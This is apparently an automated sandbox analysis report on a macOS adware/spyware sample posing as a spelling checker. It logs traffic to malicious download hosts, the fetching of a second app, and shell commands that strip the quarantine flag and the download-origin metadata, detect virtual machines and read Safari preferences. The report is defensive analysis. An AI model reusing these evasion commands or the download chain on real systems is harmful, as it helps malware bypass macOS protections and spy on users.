Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report iWk7svKGhJ

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:61433
Start date:03.10.2018
Start time:14:11:09
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 31s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:iWk7svKGhJ (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal72.adwa.spyw.evad.macAPP@0/8@2/0

Detection

StrategyScoreRangeReportingDetection
Threshold720 - 100Report FP / FNmalicious

Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample will exhibit less behavior



Signature Overview

Click to jump to signature section


Networking:

barindex
Downloads compressed data via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 03 Oct 2018 12:12:21 GMTContent-Type: application/zipContent-Length: 53113Last-Modified: Tue, 25 Sep 2018 17:08:06 GMTConnection: keep-aliveETag: "5baa6b76-cf79"Accept-Ranges: bytesData Raw: 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 af 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 30 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /hello.txt HTTP/1.1Host: vision-set.downloadAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /hello.txt HTTP/1.1Host: vision-set.downloadAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /readautoip.php?prefix=upd: HTTP/1.1Host: rs64nrl.infoAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /files/cmdse.txt HTTP/1.1Host: vision-set.downloadAccept: */*Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /files/Search.zip HTTP/1.1Host: vision-set.downloadAccept: */*Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: vision-set.download
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /api/event/ping.php HTTP/1.1Host: vision-set.downloadContent-Type: text/plainConnection: keep-aliveX-Sig: 9d367d4a3ad24b5a591135355f3e9c86Accept: */*Accept-Language: en-usContent-Length: 664Accept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.9.15Date: Wed, 03 Oct 2018 12:12:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveAccess-Control-Allow-Origin: *Content-Encoding: gzipData Raw: 32 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 4e ad 54 c8 cb 2f 51 48 cb 2f cd 4b 51 04 00 c6 30 55 ce 0e 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 22NT/QH/KQ0U0

Spam, unwanted Advertisements and Ransom Demands:

barindex
Reads the preferences of SafariShow sources
Source: /bin/sh (PID: 725)Defaults executable reading com.apple.Safari Preferences: /usr/bin/defaultsJump to behavior

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal72.adwa.spyw.evad.macAPP@0/8@2/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

barindex
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/unzip (PID: 718)Permissions modified for written 64-bit Mach-O /private/tmp/Search.app/Contents/MacOS/Search: bits: - usr: rx grp: rx all: rwxJump to dropped file
Creates application bundlesShow sources
Source: /usr/bin/unzip (PID: 718)Bundle Info.plist file created: Search.app/Contents/Info.plistJump to behavior
Creates code signed application bundlesShow sources
Source: /usr/bin/unzip (PID: 718)Bundle code signature resource file created: Search.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Hidden file created: /tmp/.dat.nosync02c6.3NY2tsJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Shell command executed: /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -lJump to behavior
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Shell command executed: /bin/sh -c cd /tmp/ /usr/bin/unzip -o /tmp/ot4860.zipJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Shell command executed: /bin/sh -c /bin/sh -c 'defaults read com.apple.Safari \'NSWindow Frame Preferences\' > /tmp/b.txt ' &Jump to behavior
Source: /bin/sh (PID: 724)Shell command executed: /bin/sh -c defaults read com.apple.Safari 'NSWindow Frame Preferences' > /tmp/b.txtJump to behavior
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 713)Grep executable: /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Opens applications that may be created onesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Application opened: /usr/bin/open /tmp/Search.appJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 721)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Reads, modifies and/or removes extended attributes containing macOS specific file meta dataShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zipJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/unzip (PID: 718)File written: /private/tmp/Search.app/Contents/MacOS/SearchJump to dropped file
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/unzip (PID: 718)64-bit Mach-O written to tmp path: /private/tmp/Search.app/Contents/MacOS/SearchJump to dropped file
Writes ZIP files to diskShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)ZIP file created: /private/tmp/.dat.nosync02c6.3NY2tsJump to dropped file
App bundle is code signedShow sources
Source: Submitted file: iWk7svKGhJ.appCodeResources XML file: CodeResources
Source: Submitted file: iWk7svKGhJ.appCodeResources XML file: CodeResources
Source: Submitted file: .dat.nosync02c6.3NY2ts.266.drCodeResources XML file: CodeResources
Source: Submitted file: .dat.nosync02c6.3NY2ts.266.drCodeResources XML file: CodeResources
Reads data from the local random generatorShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Random device file read: /dev/urandomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /usr/bin/xattr (PID: 715)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 716)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 719)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 720)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /usr/bin/unzip (PID: 718)XML plist file created: /private/tmp/Search.app/Contents/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 718)Binary plist file created: /private/tmp/Search.app/Contents/Resources/Base.lproj/MainMenu.nibJump to dropped file
Source: /usr/bin/unzip (PID: 718)XML plist file created: /private/tmp/Search.app/Contents/Info.plistJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Removes the kMDItemWhereFroms bit to disguise the files origin (typically to hide the source URL if downloaded)Show sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Xattr command executed: /usr/bin/xattr -d -r com.apple.metadata:kMDItemWhereFroms /tmp/ot4860.zipJump to behavior

Malware Analysis System Evasion:

barindex
Searches for VM related strings in files or piped streams (probably for evasion)Show sources
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior
Source: /bin/sh (PID: 713)Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e ParallelsJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Removes the quarantine attribute (used to protect from malware) from filesShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zipJump to behavior
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Executes the "ioreg" command used to gather hardware information (I/O kit registry)Show sources
Source: /bin/sh (PID: 712)IOreg executable: /usr/sbin/ioreg -> ioreg -lJump to behavior
Reads hardware related sysctl valuesShow sources
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 711)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 717)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 723)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 724)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/open (PID: 721)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Executes the "defaults" command used to read or modify user specific settingsShow sources
Source: /bin/sh (PID: 725)Defaults executable: /usr/bin/defaults -> defaults read com.apple.Safari NSWindow Frame PreferencesJump to behavior


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 61433 Sample: iWk7svKGhJ Startdate: 03/10/2018 Architecture: MAC Score: 72 40 rs64nrl.info 163.172.60.125, 49237, 80 AS12876FR United Kingdom 2->40 42 vision-set.download 195.154.31.197, 49235, 49236, 49238 AS12876FR France 2->42 8 xpcproxy SpellingChecker 1 2->8         started        11 xpcproxy Search 2->11         started        process3 signatures4 52 Removes the kMDItemWhereFroms bit to disguise the files origin (typically to hide the source URL if downloaded) 8->52 54 Removes the quarantine attribute (used to protect from malware) from files 8->54 13 sh 8->13         started        15 sh 8->15         started        17 xattr Python 8->17         started        21 4 other processes 8->21 19 sh 11->19         started        process5 process6 23 sh ioreg 13->23         started        26 sh grep 13->26         started        28 sh wc 13->28         started        30 sh unzip 5 15->30         started        33 sh sh 19->33         started        file7 48 Executes the "ioreg" command used to gather hardware information (I/O kit registry) 23->48 50 Searches for VM related strings in files or piped streams (probably for evasion) 26->50 38 /private/tmp/Searc...ntents/MacOS/Search, Mach-O 30->38 dropped 35 sh defaults 1 33->35         started        signatures8 process9 signatures10 44 Reads the preferences of Safari 35->44 46 Executes the "defaults" command used to read or modify user specific settings 35->46

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots